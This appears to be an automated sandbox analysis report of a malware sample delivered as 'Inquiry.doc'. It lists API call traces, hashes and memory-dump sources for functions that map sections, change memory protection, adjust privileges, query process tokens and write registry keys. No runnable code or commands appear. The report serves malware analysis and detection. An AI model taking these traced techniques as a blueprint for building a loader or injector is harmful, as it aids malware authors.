  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 64193

General

Root Process Name:d3d8sext.exe
Process MD5:DA7FC1804FFFBD92337277B095147E63
Total matches:136
Initial Analysis Report:Open
Initial sample Analysis ID:64193
Initial sample SHA 256:E999616249FE0433E41C5B578EFB3333A0DBFCF040B6DE1C8AFA4905C4B736A1
Initial sample name:Inquiry.doc

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
